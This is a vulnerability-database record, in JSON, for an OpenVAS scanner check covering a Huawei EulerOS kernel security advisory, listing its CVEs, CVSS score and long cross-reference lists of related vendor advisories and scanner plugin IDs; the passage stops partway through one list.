DATABASE RESOURCES PRICING ABOUT US

{"id": "OPENVAS:1361412562311220191508", "vendorId": null, "type": "openvas", "bulletinFamily": "scanner", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1508)", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "published": "2020-01-23T00:00:00", "modified": "2020-02-05T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191508", "reporter": "Copyright (C) 2020 Greenbone Networks GmbH", "references": ["2019-1508", "https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1508"], "cvelist": ["CVE-2016-9794", "CVE-2013-4513", "CVE-2016-7917", "CVE-2014-1737", "CVE-2015-1420", "CVE-2014-4655", "CVE-2016-5343", "CVE-2015-5257", "CVE-2016-5243", "CVE-2017-1000364", "CVE-2015-7515", "CVE-2014-3631", "CVE-2017-6345", "CVE-2016-4578", "CVE-2015-8961", "CVE-2015-8575", "CVE-2013-4587", "CVE-2017-2618", "CVE-2014-9419", "CVE-2018-14616"], "immutableFields": [], "lastseen": "2020-02-05T16:38:27", "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "altlinux", "idList": ["0A73C01D4DA08B819B9C4B612AFC80EC"]}, {"type": "amazon", "idList": ["ALAS-2016-726", "ALAS-2017-845"]}, {"type": "android", "idList": ["ANDROID:CVE-2015-8961", "ANDROID:CVE-2016-9794"]}, {"type": "androidsecurity", "idList": ["ANDROID:2016-08-01", "ANDROID:2016-09-01", "ANDROID:2016-10-01", "ANDROID:2016-11-01", "ANDROID:2017-05-01"]}, {"type": "archlinux", "idList": ["ASA-201706-28", "ASA-201706-30", "ASA-201706-31"]}, {"type": "centos", "idList": ["CESA-2014:0740", "CESA-2014:0771", "CESA-2014:1392", "CESA-2014:1971", "CESA-2015:1081", "CESA-2015:2152", "CESA-2016:2574", "CESA-2017:0933", "CESA-2017:1484", "CESA-2017:1486"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:10916BBD941416F67134F1200DE97709", "CFOUNDRY:15914764000DDC203CA1C6352FDFCDC2", "CFOUNDRY:357A3D675E310E16A6C343FB03145CD4", "CFOUNDRY:3F54C95B87B9551DBB314C8164D88E3A", "CFOUNDRY:40058483A2E2195544934D494FF464F7", "CFOUNDRY:63AC599C6730C4293761CECD360AA195", "CFOUNDRY:897C3471765453EA05465A73CDC16BBB", "CFOUNDRY:96E3A8B8A251E08132E367B0C5BCD522", "CFOUNDRY:CAC337307F043175ACEEE3B0FD0416FF", "CFOUNDRY:DFAB11FD33D131C30AACDE9F4864FC0F", "CFOUNDRY:F5F537A71E1AA4DEDACA06B703EC9D12", "CFOUNDRY:F8D3E57E228B2A2C80205C1B54F3649B"]}, {"type": "cve", "idList": ["CVE-2013-4513", "CVE-2013-4587", "CVE-2013-6379", "CVE-2014-1737", "CVE-2014-3631", "CVE-2014-4655", "CVE-2014-9419", "CVE-2015-1420", "CVE-2015-5257", "CVE-2015-5275", "CVE-2015-7515", "CVE-2015-8575", "CVE-2015-8961", "CVE-2016-4578", "CVE-2016-5243", "CVE-2016-5343", "CVE-2016-7917", "CVE-2016-9794", "CVE-2017-1000364", "CVE-2017-2618", "CVE-2017-6345", "CVE-2018-14616"]}, {"type": "debian", "idList": ["DEBIAN:DLA-103-1:4B38C", "DEBIAN:DLA-103-1:72B78", "DEBIAN:DLA-1200-1:A0B61", "DEBIAN:DLA-155-1:5E8B0", "DEBIAN:DLA-1715-1:4A3F9", "DEBIAN:DLA-325-1:91395", "DEBIAN:DLA-378-1:26763", "DEBIAN:DLA-516-1:B66B7", "DEBIAN:DLA-772-1:EB721", "DEBIAN:DLA-849-1:12807", "DEBIAN:DLA-993-1:71AF5", "DEBIAN:DLA-993-2:8276F", "DEBIAN:DSA-2906-1:5B9FC", "DEBIAN:DSA-2926-1:1D594", "DEBIAN:DSA-2928-1:6623C", "DEBIAN:DSA-3128-1:80F9C", "DEBIAN:DSA-3128-1:87238", "DEBIAN:DSA-3170-1:F6570", "DEBIAN:DSA-3372-1:9C218", "DEBIAN:DSA-3372-1:CF728", "DEBIAN:DSA-3434-1:98A31", "DEBIAN:DSA-3434-1:C4F9A", "DEBIAN:DSA-3607-1:0BD6E", "DEBIAN:DSA-3607-1:29E1C", "DEBIAN:DSA-3791-1:0D4D5", "DEBIAN:DSA-3791-1:AE0FD", "DEBIAN:DSA-3804-1:0976E", "DEBIAN:DSA-3804-1:E7F94", "DEBIAN:DSA-3886-1:89166", "DEBIAN:DSA-3886-1:F6458", "DEBIAN:DSA-3886-2:AC7E4", "DEBIAN:DSA-3886-2:DBE52"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2013-4513", "DEBIANCVE:CVE-2013-4587", "DEBIANCVE:CVE-2014-1737", "DEBIANCVE:CVE-2014-3631", "DEBIANCVE:CVE-2014-4655", "DEBIANCVE:CVE-2014-9419", "DEBIANCVE:CVE-2015-1420", "DEBIANCVE:CVE-2015-5257", "DEBIANCVE:CVE-2015-7515", "DEBIANCVE:CVE-2015-8575", "DEBIANCVE:CVE-2015-8961", "DEBIANCVE:CVE-2016-4578", "DEBIANCVE:CVE-2016-5243", "DEBIANCVE:CVE-2016-5343", "DEBIANCVE:CVE-2016-7917", "DEBIANCVE:CVE-2016-9794", "DEBIANCVE:CVE-2017-1000364", "DEBIANCVE:CVE-2017-2618", "DEBIANCVE:CVE-2017-6345", "DEBIANCVE:CVE-2018-14616"]}, {"type": "exploitdb", "idList": ["EDB-ID:46529"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1EC12227A84F918BB0C8C659BE0F2284", "EXPLOITPACK:4C655D3CA17B7B7E6BE5BEFF9024D311", "EXPLOITPACK:F56742C9921E8444522F7EF926E00010"]}, {"type": "f5", "idList": ["F5:K17130", "F5:K17551", "F5:K24642829", "F5:K31209433", "F5:K50462644", "F5:K51931024", "SOL15729", "SOL17130", "SOL17551", "SOL24642829"]}, {"type": "fedora", "idList": ["FEDORA:0777460874C8", "FEDORA:0960721640", "FEDORA:0D267606CFB3", "FEDORA:0D8242218A", "FEDORA:131186087E1C", "FEDORA:14809606180F", "FEDORA:1661D600FD84", "FEDORA:1835E22100", "FEDORA:18E4222173", "FEDORA:1AE8521943", "FEDORA:1CCC322073", "FEDORA:1DA3D221C6", "FEDORA:23B6E225A0", "FEDORA:2417521BFF", "FEDORA:26A1460C6317", "FEDORA:26C5127E25", "FEDORA:26DF321BA7", "FEDORA:2784A21C29", "FEDORA:28A7021A1E", "FEDORA:2A0322BA2C", "FEDORA:2BA602158D", "FEDORA:2EB1060491B1", "FEDORA:2EEE52123F", "FEDORA:2F13360877A3", "FEDORA:3053760A9C97", "FEDORA:3060D60E9A21", "FEDORA:30991220A7", "FEDORA:30C5820E79", "FEDORA:33D8860877E1", "FEDORA:3595F21BB4", "FEDORA:39B5660877A6", "FEDORA:4276F60157E5", "FEDORA:4359160906D1", "FEDORA:4375D611D164", "FEDORA:4A1AB21BE1", "FEDORA:4A2C76087582", "FEDORA:4F15F6087C54", "FEDORA:51510605E219", "FEDORA:51EB2601616F", "FEDORA:57F742243A", "FEDORA:60B8C60918D5", "FEDORA:6435A6076A13", "FEDORA:6A93C20D15", "FEDORA:756F822091", "FEDORA:7734E613B647", "FEDORA:7ED1D60A8F65", "FEDORA:84C4E22D8F", "FEDORA:85BCF6087CBF", "FEDORA:8C2D26090BD4", "FEDORA:8C61D2154D", "FEDORA:8E01360DC908", "FEDORA:8EFBC604949F", "FEDORA:92F5160877B4", "FEDORA:9330A21FE6", "FEDORA:936A4223EA", "FEDORA:9A43A20EE9", "FEDORA:9AEA46074A7D", "FEDORA:9FA6021249", "FEDORA:A4C8660C350E", "FEDORA:ACCF760419AA", "FEDORA:B72CD214AC", "FEDORA:B81A721D1C", "FEDORA:B91586087C43", "FEDORA:B9A2260A96D5", "FEDORA:B9C4760130DC", "FEDORA:BB98A23319", "FEDORA:BD41660BC2B1", "FEDORA:C26F460906BA", "FEDORA:C35B860CD859", "FEDORA:C56CF6087715", "FEDORA:CE3236087E07", "FEDORA:CFDB8604972F", "FEDORA:D0CC960762B3", "FEDORA:D15E060F33C2", "FEDORA:D69CC24B48", "FEDORA:DB49F219DE", "FEDORA:DC12C6205E95", "FEDORA:DE40F21338", "FEDORA:E1CE2605E17A", "FEDORA:E45AE211C5", "FEDORA:E6C59213CA", "FEDORA:E7CE72245B", "FEDORA:E8A1B605F1FB", "FEDORA:EFDE7605A2A8", "FEDORA:F015721408"]}, {"type": "ibm", "idList": ["2ABC4CD376C07922A3144CF8116D979F4BDDE16EED9AADA11262FBF58C851DBF", "6B8D264C112CFCDDCE94E39A330DF7082557BFFF177349A0F825B791060643AF", "7641F2A34E9EF589125217FD1A5FB06B7E7F04F58917271C72C2F17099556009", "A0B51C5217767E75AB974BA93584FB1F969514BA8D7EE9EDD025C20F274C1D2F", "B13E9CABE04A3A8E052E5DD7075F194AB2BDBB1AA759BCA55EBEBB657F688C5F", "B7EDA2450D13E204B60C3A3E7379E6FCCD587CB32FEB5041ADDA6CB8E3C44FC3", "F092FBBD34304315E258962CA397F72D24D88CD673A181734FDCE39754098484", "F3D623A09E7D0F54DD4072DEEB91BB4360FCB6F12BC404A385E6347E729DB982"]}, {"type": "kaspersky", "idList": ["KLA10480"]}, {"type": "lenovo", "idList": ["LENOVO:PS500144-LENOVO-STORSELECT-DX8200C-GLIBC-LINUX-KERNEL-AND-CLOUDIAN-MANAGEMENT-CONSOLE-VULNERABILITIES-NOSID", "LENOVO:PS500144-NOSID", "LENOVO:PS500321-NOSID"]}, {"type": "mageia", "idList": ["MGAA-2016-0134", "MGASA-2013-0371", "MGASA-2013-0372", "MGASA-2013-0373", "MGASA-2013-0374", "MGASA-2013-0375", "MGASA-2014-0043", "MGASA-2014-0225", "MGASA-2014-0226", "MGASA-2014-0227", "MGASA-2014-0228", "MGASA-2014-0229", "MGASA-2014-0234", "MGASA-2014-0235", "MGASA-2014-0236", "MGASA-2014-0237", "MGASA-2014-0238", "MGASA-2014-0451", "MGASA-2014-0452", "MGASA-2014-0453", "MGASA-2014-0454", "MGASA-2014-0455", "MGASA-2014-0456", "MGASA-2014-0459", "MGASA-2014-0479", "MGASA-2015-0006", "MGASA-2015-0075", "MGASA-2015-0076", "MGASA-2015-0077", "MGASA-2015-0078", "MGASA-2015-0435", "MGASA-2015-0439", "MGASA-2016-0015", "MGASA-2016-0225", "MGASA-2016-0232", "MGASA-2016-0233", "MGASA-2016-0345", "MGASA-2016-0364", "MGASA-2016-0429", "MGASA-2017-0003", "MGASA-2017-0004", "MGASA-2017-0136", "MGASA-2017-0147", "MGASA-2017-0148", "MGASA-2017-0186", "MGASA-2017-0187", "MGASA-2017-0188"]}, {"type": "nessus", "idList": ["ALA_ALAS-2016-726.NASL", "ALA_ALAS-2017-845.NASL", "CENTOS_RHSA-2014-0740.NASL", "CENTOS_RHSA-2014-0771.NASL", "CENTOS_RHSA-2014-1392.NASL", "CENTOS_RHSA-2014-1971.NASL", "CENTOS_RHSA-2015-1081.NASL", "CENTOS_RHSA-2015-2152.NASL", "CENTOS_RHSA-2016-2574.NASL", "CENTOS_RHSA-2017-0933.NASL", "CENTOS_RHSA-2017-1484.NASL", "CENTOS_RHSA-2017-1486.NASL", "DEBIAN_DLA-103.NASL", "DEBIAN_DLA-1200.NASL", "DEBIAN_DLA-155.NASL", "DEBIAN_DLA-1715.NASL", "DEBIAN_DLA-325.NASL", "DEBIAN_DLA-378.NASL", "DEBIAN_DLA-516.NASL", "DEBIAN_DLA-772.NASL", "DEBIAN_DLA-849.NASL", "DEBIAN_DLA-993.NASL", "DEBIAN_DSA-2906.NASL", "DEBIAN_DSA-2926.NASL", "DEBIAN_DSA-2928.NASL", "DEBIAN_DSA-3128.NASL", "DEBIAN_DSA-3170.NASL", "DEBIAN_DSA-3372.NASL", "DEBIAN_DSA-3434.NASL", "DEBIAN_DSA-3607.NASL", "DEBIAN_DSA-3791.NASL", "DEBIAN_DSA-3804.NASL", "DEBIAN_DSA-3886.NASL", "EULEROS_SA-2017-1071.NASL", "EULEROS_SA-2017-1072.NASL", "EULEROS_SA-2017-1154.NASL", "EULEROS_SA-2017-1155.NASL", "EULEROS_SA-2019-1475.NASL", "EULEROS_SA-2019-1479.NASL", "EULEROS_SA-2019-1480.NASL", "EULEROS_SA-2019-1481.NASL", "EULEROS_SA-2019-1483.NASL", "EULEROS_SA-2019-1485.NASL", "EULEROS_SA-2019-1488.NASL", "EULEROS_SA-2019-1489.NASL", "EULEROS_SA-2019-1494.NASL", "EULEROS_SA-2019-1498.NASL", "EULEROS_SA-2019-1508.NASL", "EULEROS_SA-2019-2353.NASL", "EULEROS_SA-2019-2599.NASL", "F5_BIGIP_SOL17551.NASL", "F5_BIGIP_SOL51931024.NASL", "FEDORA_2013-23445.NASL", "FEDORA_2013-23653.NASL", "FEDORA_2014-10693.NASL", "FEDORA_2014-11031.NASL", "FEDORA_2014-6354.NASL", "FEDORA_2014-6357.NASL", "FEDORA_2015-0515.NASL", "FEDORA_2015-0517.NASL", "FEDORA_2015-3C8C8BA072.NASL", "FEDORA_2015-9704.NASL", "FEDORA_2015-9712.NASL", "FEDORA_2015-AC9A19888E.NASL", "FEDORA_2015-C4ED00A68F.NASL", "FEDORA_2015-D7E074BA30.NASL", "FEDORA_2015-DCC260F2F2.NASL", "FEDORA_2016-3DAF782DFA.NASL", "FEDORA_2016-5D43766E33.NASL", "FEDORA_2016-6CE812A1E0.NASL", "FEDORA_2016-80EDB9D511.NASL", "FEDORA_2016-E0F3FCD7DF.NASL", "FEDORA_2017-05F10E29F4.NASL", "FEDORA_2017-D3ED702FE4.NASL", "FEDORA_2017-D7BC1B3056.NASL", "FIREEYE_OS_EX_801.NASL", "JUNIPER_SPACE_JSA10917_184R1.NASL", "JUNIPER_SPACE_JSA_10826.NASL", "MANDRIVA_MDVSA-2014-001.NASL", "MANDRIVA_MDVSA-2014-124.NASL", "MANDRIVA_MDVSA-2014-155.NASL", "MANDRIVA_MDVSA-2015-027.NASL", "MANDRIVA_MDVSA-2015-058.NASL", "MCAFEE_WEB_GATEWAY_SB10205.NASL", "NEWSTART_CGSL_NS-SA-2019-0004_KERNEL.NASL", "NEWSTART_CGSL_NS-SA-2019-0099_KERNEL.NASL", "OPENSUSE-2014-113.NASL", "OPENSUSE-2014-114.NASL", "OPENSUSE-2014-375.NASL", "OPENSUSE-2014-376.NASL", "OPENSUSE-2014-478.NASL", "OPENSUSE-2014-493.NASL", "OPENSUSE-2015-301.NASL", "OPENSUSE-2015-302.NASL", "OPENSUSE-2015-543.NASL", "OPENSUSE-2016-1015.NASL", "OPENSUSE-2016-1029.NASL", "OPENSUSE-2016-1076.NASL", "OPENSUSE-2016-116.NASL", "OPENSUSE-2016-124.NASL", "OPENSUSE-2016-136.NASL", "OPENSUSE-2016-1426.NASL", "OPENSUSE-2016-1428.NASL", "OPENSUSE-2016-1454.NASL", "OPENSUSE-2016-753.NASL", "OPENSUSE-2017-246.NASL", "OPENSUSE-2017-418.NASL", "OPENSUSE-2017-419.NASL", "OPENSUSE-2017-716.NASL", "OPENSUSE-2017-734.NASL", "ORACLELINUX_ELSA-2014-0740-1.NASL", "ORACLELINUX_ELSA-2014-0740.NASL", "ORACLELINUX_ELSA-2014-0771.NASL", "ORACLELINUX_ELSA-2014-0786.NASL", "ORACLELINUX_ELSA-2014-1392.NASL", "ORACLELINUX_ELSA-2014-1971.NASL", "ORACLELINUX_ELSA-2014-3034.NASL", "ORACLELINUX_ELSA-2014-3041.NASL", "ORACLELINUX_ELSA-2014-3042.NASL", "ORACLELINUX_ELSA-2014-3043.NASL", "ORACLELINUX_ELSA-2014-3070.NASL", "ORACLELINUX_ELSA-2014-3081.NASL", "ORACLELINUX_ELSA-2014-3082.NASL", "ORACLELINUX_ELSA-2014-3083.NASL", "ORACLELINUX_ELSA-2014-3096.NASL", "ORACLELINUX_ELSA-2015-0290.NASL", "ORACLELINUX_ELSA-2015-1081.NASL", "ORACLELINUX_ELSA-2015-1272.NASL", "ORACLELINUX_ELSA-2015-2152.NASL", "ORACLELINUX_ELSA-2015-3041.NASL", "ORACLELINUX_ELSA-2015-3042.NASL", "ORACLELINUX_ELSA-2015-3043.NASL", "ORACLELINUX_ELSA-2016-2574.NASL", "ORACLELINUX_ELSA-2016-3644.NASL", "ORACLELINUX_ELSA-2016-3645.NASL", "ORACLELINUX_ELSA-2016-3646.NASL", "ORACLELINUX_ELSA-2017-0933-1.NASL", "ORACLELINUX_ELSA-2017-0933.NASL", "ORACLELINUX_ELSA-2017-1484.NASL", "ORACLELINUX_ELSA-2017-1486.NASL", "ORACLELINUX_ELSA-2017-1615-1.NASL", "ORACLELINUX_ELSA-2017-1842-1.NASL", "ORACLELINUX_ELSA-2017-3508.NASL", "ORACLELINUX_ELSA-2017-3509.NASL", "ORACLELINUX_ELSA-2017-3510.NASL", "ORACLELINUX_ELSA-2017-3516.NASL", "ORACLELINUX_ELSA-2017-3533.NASL", "ORACLELINUX_ELSA-2017-3534.NASL", "ORACLELINUX_ELSA-2017-3535.NASL", "ORACLELINUX_ELSA-2017-3566.NASL", "ORACLELINUX_ELSA-2017-3567.NASL", "ORACLELINUX_ELSA-2017-3587.NASL", "ORACLELINUX_ELSA-2017-3592.NASL", "ORACLELINUX_ELSA-2017-3595.NASL", "ORACLELINUX_ELSA-2017-3609.NASL", "ORACLELINUX_ELSA-2017-3640.NASL", "ORACLELINUX_ELSA-2017-3651.NASL", "ORACLELINUX_ELSA-2017-3658.NASL", "ORACLELINUX_ELSA-2017-3659.NASL", "ORACLELINUX_ELSA-2018-4071.NASL", "ORACLELINUX_ELSA-2018-4164.NASL", "ORACLELINUX_ELSA-2018-4172.NASL", "ORACLELINUX_ELSA-2020-5912.NASL", "ORACLEVM_OVMSA-2015-0069.NASL", "ORACLEVM_OVMSA-2016-0037.NASL", "ORACLEVM_OVMSA-2016-0162.NASL", "ORACLEVM_OVMSA-2016-0163.NASL", "ORACLEVM_OVMSA-2016-0167.NASL", "ORACLEVM_OVMSA-2016-0181.NASL", "ORACLEVM_OVMSA-2017-0004.NASL", "ORACLEVM_OVMSA-2017-0005.NASL", "ORACLEVM_OVMSA-2017-0006.NASL", "ORACLEVM_OVMSA-2017-0041.NASL", "ORACLEVM_OVMSA-2017-0056.NASL", "ORACLEVM_OVMSA-2017-0057.NASL", "ORACLEVM_OVMSA-2017-0058.NASL", "ORACLEVM_OVMSA-2017-0105.NASL", "ORACLEVM_OVMSA-2017-0106.NASL", "ORACLEVM_OVMSA-2017-0115.NASL", "ORACLEVM_OVMSA-2017-0126.NASL", "ORACLEVM_OVMSA-2017-0145.NASL", "ORACLEVM_OVMSA-2017-0169.NASL", "ORACLEVM_OVMSA-2017-0172.NASL", "ORACLEVM_OVMSA-2017-0174.NASL", "ORACLEVM_OVMSA-2018-0015.NASL", "ORACLEVM_OVMSA-2018-0035.NASL", "ORACLEVM_OVMSA-2018-0237.NASL", "ORACLEVM_OVMSA-2020-0051.NASL", "PHOTONOS_PHSA-2017-0022.NASL", "PHOTONOS_PHSA-2017-0022_LINUX.NASL", "RANCHEROS_1_0_3.NASL", "REDHAT-RHSA-2014-0557.NASL", "REDHAT-RHSA-2014-0740.NASL", "REDHAT-RHSA-2014-0771.NASL", "REDHAT-RHSA-2014-0772.NASL", "REDHAT-RHSA-2014-0786.NASL", "REDHAT-RHSA-2014-0800.NASL", "REDHAT-RHSA-2014-0801.NASL", "REDHAT-RHSA-2014-0815.NASL", "REDHAT-RHSA-2014-0900.NASL", "REDHAT-RHSA-2014-1083.NASL", "REDHAT-RHSA-2014-1392.NASL", "REDHAT-RHSA-2014-1971.NASL", "REDHAT-RHSA-2015-1081.NASL", "REDHAT-RHSA-2015-2152.NASL", "REDHAT-RHSA-2015-2411.NASL", "REDHAT-RHSA-2016-2574.NASL", "REDHAT-RHSA-2016-2584.NASL", "REDHAT-RHSA-2017-0931.NASL", "REDHAT-RHSA-2017-0932.NASL", "REDHAT-RHSA-2017-0933.NASL", "REDHAT-RHSA-2017-1482.NASL", "REDHAT-RHSA-2017-1483.NASL", "REDHAT-RHSA-2017-1484.NASL", "REDHAT-RHSA-2017-1485.NASL", "REDHAT-RHSA-2017-1486.NASL", "REDHAT-RHSA-2017-1487.NASL", "REDHAT-RHSA-2017-1488.NASL", "REDHAT-RHSA-2017-1489.NASL", "REDHAT-RHSA-2017-1490.NASL", "REDHAT-RHSA-2017-1491.NASL", "REDHAT-RHSA-2017-1616.NASL", "REDHAT-RHSA-2017-1647.NASL", "SLACKWARE_SSA_2017-177-01.NASL", "SLACKWARE_SSA_2017-180-01.NASL", "SLACKWARE_SSA_2017-184-01.NASL", "SLACKWARE_SSA_2019-030-01.NASL", "SL_20140610_KERNEL_ON_SL5_X.NASL", "SL_20140619_KERNEL_ON_SL6_X.NASL", "SL_20141014_KERNEL_ON_SL6_X.NASL", "SL_20141209_KERNEL_ON_SL7_X.NASL", "SL_20150609_KERNEL_ON_SL6_X.NASL", "SL_20151119_KERNEL_ON_SL7_X.NASL", "SL_20161103_KERNEL_ON_SL7_X.NASL", "SL_20170412_KERNEL_ON_SL7_X.NASL", "SL_20170619_KERNEL_ON_SL6_X.NASL", "SL_20170619_KERNEL_ON_SL7_X.NASL", "SUSE_11_KERNEL-140116.NASL", "SUSE_11_KERNEL-140124.NASL", "SUSE_11_KERNEL-140125.NASL", "SUSE_11_KERNEL-140513.NASL", "SUSE_11_KERNEL-140709.NASL", "SUSE_11_KERNEL-150306.NASL", "SUSE_SU-2014-0140-1.NASL", "SUSE_SU-2014-0189-1.NASL", "SUSE_SU-2014-0287-1.NASL", "SUSE_SU-2014-0772-1.NASL", "SUSE_SU-2014-0773-1.NASL", "SUSE_SU-2014-0832-1.NASL", "SUSE_SU-2014-1105-1.NASL", "SUSE_SU-2014-1138-1.NASL", "SUSE_SU-2015-0529-1.NASL", "SUSE_SU-2015-0812-1.NASL", "SUSE_SU-2015-1174-1.NASL", "SUSE_SU-2015-1478-1.NASL", "SUSE_SU-2015-1611-1.NASL", "SUSE_SU-2015-1678-1.NASL", "SUSE_SU-2016-0168-1.NASL", "SUSE_SU-2016-0585-1.NASL", "SUSE_SU-2016-0911-1.NASL", "SUSE_SU-2016-1203-1.NASL", "SUSE_SU-2016-1672-1.NASL", "SUSE_SU-2016-1690-1.NASL", "SUSE_SU-2016-2074-1.NASL", "SUSE_SU-2016-2105-1.NASL", "SUSE_SU-2016-2245-1.NASL", "SUSE_SU-2016-3146-1.NASL", "SUSE_SU-2016-3188-1.NASL", "SUSE_SU-2016-3203-1.NASL", "SUSE_SU-2016-3217-1.NASL", "SUSE_SU-2016-3248-1.NASL", "SUSE_SU-2016-3252-1.NASL", "SUSE_SU-2017-0181-1.NASL", "SUSE_SU-2017-0244-1.NASL", "SUSE_SU-2017-0245-1.NASL", "SUSE_SU-2017-0246-1.NASL", "SUSE_SU-2017-0247-1.NASL", "SUSE_SU-2017-0248-1.NASL", "SUSE_SU-2017-0249-1.NASL", "SUSE_SU-2017-0267-1.NASL", "SUSE_SU-2017-0268-1.NASL", "SUSE_SU-2017-0333-1.NASL", "SUSE_SU-2017-1183-1.NASL", "SUSE_SU-2017-1247-1.NASL", "SUSE_SU-2017-1301-1.NASL", "SUSE_SU-2017-1360-1.NASL", "SUSE_SU-2017-1613-1.NASL", "SUSE_SU-2017-1615-1.NASL", "SUSE_SU-2017-1617-1.NASL", "SUSE_SU-2017-1618-1.NASL", "SUSE_SU-2017-1628-1.NASL", "SUSE_SU-2017-1696-1.NASL", "SUSE_SU-2017-1704-1.NASL", "SUSE_SU-2017-1706-1.NASL", "SUSE_SU-2017-1707-1.NASL", "SUSE_SU-2017-1735-1.NASL", "SUSE_SU-2017-1905-1.NASL", "SUSE_SU-2017-1906-1.NASL", "SUSE_SU-2017-1909-1.NASL", "SUSE_SU-2017-1910-1.NASL", "SUSE_SU-2017-1912-1.NASL", "SUSE_SU-2017-1915-1.NASL", "SUSE_SU-2017-1922-1.NASL", "SUSE_SU-2017-1924-1.NASL", "SUSE_SU-2017-1937-1.NASL", "SUSE_SU-2017-1939-1.NASL", "SUSE_SU-2017-1941-1.NASL", "SUSE_SU-2017-1942-1.NASL", "SUSE_SU-2017-1943-1.NASL", "SUSE_SU-2017-1944-1.NASL", "SUSE_SU-2017-1945-1.NASL", "SUSE_SU-2017-1946-1.NASL", "SUSE_SU-2017-2525-1.NASL", "UBUNTU_USN-2068-1.NASL", "UBUNTU_USN-2069-1.NASL", "UBUNTU_USN-2070-1.NASL", "UBUNTU_USN-2071-1.NASL", "UBUNTU_USN-2073-1.NASL", "UBUNTU_USN-2075-1.NASL", "UBUNTU_USN-2109-1.NASL", "UBUNTU_USN-2113-1.NASL", "UBUNTU_USN-2117-1.NASL", "UBUNTU_USN-2128-1.NASL", "UBUNTU_USN-2129-1.NASL", "UBUNTU_USN-2135-1.NASL", "UBUNTU_USN-2136-1.NASL", "UBUNTU_USN-2138-1.NASL", "UBUNTU_USN-2219-1.NASL", "UBUNTU_USN-2220-1.NASL", "UBUNTU_USN-2221-1.NASL", "UBUNTU_USN-2223-1.NASL", "UBUNTU_USN-2224-1.NASL", "UBUNTU_USN-2225-1.NASL", "UBUNTU_USN-2226-1.NASL", "UBUNTU_USN-2228-1.NASL", "UBUNTU_USN-2260-1.NASL", "UBUNTU_USN-2332-1.NASL", "UBUNTU_USN-2333-1.NASL", "UBUNTU_USN-2334-1.NASL", "UBUNTU_USN-2336-1.NASL", "UBUNTU_USN-2337-1.NASL", "UBUNTU_USN-2378-1.NASL", "UBUNTU_USN-2379-1.NASL", "UBUNTU_USN-2515-1.NASL", "UBUNTU_USN-2515-2.NASL", "UBUNTU_USN-2516-1.NASL", "UBUNTU_USN-2516-2.NASL", "UBUNTU_USN-2516-3.NASL", "UBUNTU_USN-2517-1.NASL", "UBUNTU_USN-2518-1.NASL", "UBUNTU_USN-2541-1.NASL", "UBUNTU_USN-2660-1.NASL", "UBUNTU_USN-2662-1.NASL", "UBUNTU_USN-2663-1.NASL", "UBUNTU_USN-2664-1.NASL", "UBUNTU_USN-2665-1.NASL", "UBUNTU_USN-2666-1.NASL", "UBUNTU_USN-2667-1.NASL", "UBUNTU_USN-2792-1.NASL", "UBUNTU_USN-2794-1.NASL", "UBUNTU_USN-2795-1.NASL", "UBUNTU_USN-2797-1.NASL", "UBUNTU_USN-2798-1.NASL", "UBUNTU_USN-2799-1.NASL", "UBUNTU_USN-2886-1.NASL", "UBUNTU_USN-2888-1.NASL", "UBUNTU_USN-2890-1.NASL", "UBUNTU_USN-2890-2.NASL", "UBUNTU_USN-2890-3.NASL", "UBUNTU_USN-2907-1.NASL", "UBUNTU_USN-2907-2.NASL", "UBUNTU_USN-2910-1.NASL", "UBUNTU_USN-2910-2.NASL", "UBUNTU_USN-2967-1.NASL", "UBUNTU_USN-2968-1.NASL", "UBUNTU_USN-2968-2.NASL", "UBUNTU_USN-2969-1.NASL", "UBUNTU_USN-2970-1.NASL", "UBUNTU_USN-2971-1.NASL", "UBUNTU_USN-2971-2.NASL", "UBUNTU_USN-2971-3.NASL", "UBUNTU_USN-3016-1.NASL", "UBUNTU_USN-3016-2.NASL", "UBUNTU_USN-3016-3.NASL", "UBUNTU_USN-3016-4.NASL", "UBUNTU_USN-3017-1.NASL", "UBUNTU_USN-3017-2.NASL", "UBUNTU_USN-3017-3.NASL", "UBUNTU_USN-3018-1.NASL", "UBUNTU_USN-3018-2.NASL", "UBUNTU_USN-3019-1.NASL", "UBUNTU_USN-3020-1.NASL", "UBUNTU_USN-3021-1.NASL", "UBUNTU_USN-3049-1.NASL", "UBUNTU_USN-3051-1.NASL", "UBUNTU_USN-3052-1.NASL", "UBUNTU_USN-3053-1.NASL", "UBUNTU_USN-3054-1.NASL", "UBUNTU_USN-3055-1.NASL", "UBUNTU_USN-3056-1.NASL", "UBUNTU_USN-3057-1.NASL", "UBUNTU_USN-3167-1.NASL", "UBUNTU_USN-3168-1.NASL", "UBUNTU_USN-3168-2.NASL", "UBUNTU_USN-3169-1.NASL", "UBUNTU_USN-3169-2.NASL", "UBUNTU_USN-3169-3.NASL", "UBUNTU_USN-3169-4.NASL", "UBUNTU_USN-3265-1.NASL", "UBUNTU_USN-3265-2.NASL", "UBUNTU_USN-3312-1.NASL", "UBUNTU_USN-3312-2.NASL", "UBUNTU_USN-3324-1.NASL", "UBUNTU_USN-3325-1.NASL", "UBUNTU_USN-3326-1.NASL", "UBUNTU_USN-3327-1.NASL", "UBUNTU_USN-3328-1.NASL", "UBUNTU_USN-3329-1.NASL", "UBUNTU_USN-3330-1.NASL", "UBUNTU_USN-3331-1.NASL", "UBUNTU_USN-3332-1.NASL", "UBUNTU_USN-3333-1.NASL", "UBUNTU_USN-3334-1.NASL", "UBUNTU_USN-3335-1.NASL", "UBUNTU_USN-3335-2.NASL", "UBUNTU_USN-3338-1.NASL", "UBUNTU_USN-3338-2.NASL", "UBUNTU_USN-3361-1.NASL", "UBUNTU_USN-3381-1.NASL", "UBUNTU_USN-3754-1.NASL", "UBUNTU_USN-3932-1.NASL", "UBUNTU_USN-3932-2.NASL", "UBUNTU_USN-4094-1.NASL", "UBUNTU_USN-4118-1.NASL", "VIRTUOZZO_VZA-2017-055.NASL", "VIRTUOZZO_VZA-2017-056.NASL", "VIRTUOZZO_VZA-2017-061.NASL", "VIRTUOZZO_VZLSA-2017-0933.NASL", "VIRTUOZZO_VZLSA-2017-1484.NASL", 